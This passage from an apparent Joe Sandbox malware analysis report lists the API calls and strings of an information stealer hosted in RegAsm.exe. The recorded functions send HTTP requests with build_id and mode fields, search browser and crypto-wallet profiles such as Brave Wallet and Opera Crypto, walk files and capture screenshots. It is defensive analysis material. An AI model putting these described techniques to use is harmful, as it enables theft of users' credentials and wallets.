                                                                                    • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                                    • GetProcAddress.KERNEL32(76300000), ref: 00418010
                                                                                    • GetProcAddress.KERNEL32(6E7D0000), ref: 0041802B
                                                                                    • GetProcAddress.KERNEL32 ref: 00418042
                                                                                    • GetProcAddress.KERNEL32 ref: 00418059
                                                                                    • GetProcAddress.KERNEL32 ref: 00418070
                                                                                    • GetProcAddress.KERNEL32(6CFB0000,SymMatchString), ref: 0041808A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                    • API String ID: 2238633743-951535364
                                                                                    • Opcode ID: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                                    • Instruction ID: 5d64eb95f993e10cfffcd180ca7930ca50f89af3c14b7aa20224d1cce3759a27
                                                                                    • Opcode Fuzzy Hash: e99d2a3dd66da67205f3114fc9aaaece5a66dc5c732b58a81b65daf475131747
                                                                                    • Instruction Fuzzy Hash: 0042D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00405151
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425AC8,00000000), ref: 004057CC
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                                    • memcpy.MSVCRT ref: 00405810
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                                    • memcpy.MSVCRT ref: 00405843
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                                    • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                                    • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                     • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                    • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                                    • API String ID: 2237346945-1447386369
                                                                                    • Opcode ID: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                                    • Instruction ID: d7c5970f0897ada52bebf96924e878e3ecce30d18c8aa08c600bdb313c44272c
                                                                                    • Opcode Fuzzy Hash: 0ad7276aa294dbd547a4d96f96a942a7d0334b21d4d2b34b5b54ff39ca66d9ac
                                                                                    • Instruction Fuzzy Hash: 51424EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DA781B4CCB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C67E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00425B7B,00425B7A,00000000,?,00425CC4,?,?,00425B77,?,?,00000000), ref: 0040C71F
                                                                                    • StrCmpCA.SHLWAPI(?,00425CC8,?,?,00000000), ref: 0040C786
                                                                                    • StrCmpCA.SHLWAPI(?,00425CCC,?,?,00000000), ref: 0040C7A0
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425CD0,?,?,00425B7E,?,?,00000000), ref: 0040C851
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                    • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004153FB
                                                                                    • wsprintfA.USER32 ref: 00415421
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                    • memset.MSVCRT ref: 0041544F
                                                                                    • memset.MSVCRT ref: 0041545D
                                                                                    • StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                                    • StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                                    • wsprintfA.USER32 ref: 004154B9
                                                                                    • StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                                    • wsprintfA.USER32 ref: 004154F0
                                                                                    • wsprintfA.USER32 ref: 00415504
                                                                                    • memset.MSVCRT ref: 00415516
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                    • strtok_s.MSVCRT ref: 00415561
                                                                                    • memset.MSVCRT ref: 00415576
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                                    • strtok_s.MSVCRT ref: 004156E1
                                                                                    • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                    • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6CCBF688,00001000), ref: 6CC335D5
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC335E0
                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6CC335FD
                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC3363F
                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC3369F
                                                                                    • __aulldiv.LIBCMT ref: 6CC336E4
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6CC33773
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC3377E
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC337BD
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6CC337C4
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC337CB
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC33801
                                                                                    • __aulldiv.LIBCMT ref: 6CC33883
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6CC33902
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6CC33918
                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6CC3394C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004162B4
                                                                                    • wsprintfA.USER32 ref: 004162D4
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                    • StrCmpCA.SHLWAPI(?,004268B0), ref: 00416308
                                                                                    • StrCmpCA.SHLWAPI(?,004268B4), ref: 00416322
                                                                                    • wsprintfA.USER32 ref: 00416346
                                                                                    • StrCmpCA.SHLWAPI(?,00426525), ref: 00416357
                                                                                    • wsprintfA.USER32 ref: 00416374
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • wsprintfA.USER32 ref: 00416388
                                                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                    • lstrcat.KERNEL32(?,004268CC), ref: 004163D9
                                                                                    • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                    • lstrcat.KERNEL32(?,004268D0), ref: 004163FB
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                    • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00411302
                                                                                    • memset.MSVCRT ref: 00411328
                                                                                    • GetDesktopWindow.USER32 ref: 0041135E
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                                    • GetDC.USER32(00000000), ref: 00411372
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                                    • GlobalFix.KERNEL32(?), ref: 00411412
                                                                                    • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                                      • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                      • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,00425987,00425983,0042597B,00425977,00425976), ref: 004044A4
                                                                                      • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                                    • DeleteObject.GDI32(?), ref: 004114B3
                                                                                    • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                                    • CloseWindow.USER32(00000000), ref: 004114CB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                    • String ID: image/jpeg
                                                                                    • API String ID: 3067874393-3785015651
                                                                                    • Opcode ID: 3bdf46d3e9d7c0e78ba7912a53a363b2d7867d1b528b743ce995cd4dcfebb4b6
                                                                                    • Instruction ID: b777bc6b67979350ab37bc7b6ce454515ef26c15ee534ccd721ea0ab8c47e668
                                                                                    • Opcode Fuzzy Hash: 3bdf46d3e9d7c0e78ba7912a53a363b2d7867d1b528b743ce995cd4dcfebb4b6
                                                                                    • Instruction Fuzzy Hash: 385118B2D00218AFDF01AFE5DD499EEBFB9FF09714F10402AFA05E2160D7394A558BA5
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415AC7
                                                                                    • wsprintfA.USER32 ref: 00415AEA
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415B01
                                                                                    • StrCmpCA.SHLWAPI(?,0042687C), ref: 00415B23
                                                                                    • StrCmpCA.SHLWAPI(?,00426880), ref: 00415B3D
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415B72
                                                                                    • lstrcat.KERNEL32(?), ref: 00415B85
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415B99
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415BA9
                                                                                    • lstrcat.KERNEL32(?,00426884), ref: 00415BBB
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415BCF
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00415C69
                                                                                    • FindClose.KERNEL32(00000000), ref: 00415C78
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                    • String ID: %s\%s
                                                                                    • API String ID: 2282932919-4073750446
                                                                                    • Opcode ID: 8a485682f3bd560c78555ff2535f4c5e4a83989996905e60acd5c30d46b0b76a
                                                                                    • Instruction ID: 88f705c6070867334dedd45070e8c549d2cf59d2b969f0f0e11c1cc9a72add11
                                                                                    • Opcode Fuzzy Hash: 8a485682f3bd560c78555ff2535f4c5e4a83989996905e60acd5c30d46b0b76a
                                                                                    • Instruction Fuzzy Hash: 68512D7290022DABDF11EBA1DD49EDE7B7CAF49304F0004AAE509E3151E7389785CBA4
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00409F77
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425BAE,00000000,-00000020,00000000), ref: 00409FF6
                                                                                    • StrCmpCA.SHLWAPI(?,00425E10), ref: 0040A050
                                                                                    • StrCmpCA.SHLWAPI(?,00425E14), ref: 0040A06A
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera,00425BBB,00425BBA,00425BB7,00425BB6,00425BB3,00425BB2,00425BAF), ref: 0040A0FD
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A111
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A125
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                    • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                    • API String ID: 3869166975-536343317
                                                                                    • Opcode ID: 6e383192cdb746ddf89457e756fd6650634d6981f08b0559ee31f2275b45e7bd
                                                                                    • Instruction ID: 1112d73afc027f2f7bfb5dc7aaaada1126a1c892b2eba4476be0d084da770975
                                                                                    • Opcode Fuzzy Hash: 6e383192cdb746ddf89457e756fd6650634d6981f08b0559ee31f2275b45e7bd
                                                                                    • Instruction Fuzzy Hash: F6424B70904288EACB15EBE5C955BDDBBB4AF19308F5040BEE409736C2DB781B4CDB66
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415848
                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                    • memset.MSVCRT ref: 004158C9
                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00415910
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 004153F6: _EH_prolog.MSVCRT ref: 004153FB
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 00415421
                                                                                      • Part of subcall function 004153F6: FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 0041544F
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 0041545D
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,004267F4), ref: 0041547B
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,004267F8), ref: 00415495
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154B9
                                                                                      • Part of subcall function 004153F6: StrCmpCA.SHLWAPI(?,00426516), ref: 004154CA
                                                                                      • Part of subcall function 004153F6: wsprintfA.USER32 ref: 004154F0
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 00415516
                                                                                      • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                      • Part of subcall function 004153F6: strtok_s.MSVCRT ref: 00415561
                                                                                      • Part of subcall function 004153F6: memset.MSVCRT ref: 00415576
                                                                                      • Part of subcall function 004153F6: lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                    • lstrlenA.KERNEL32(?), ref: 00415998
                                                                                    Strings
                                                                                    Memory Dump Source
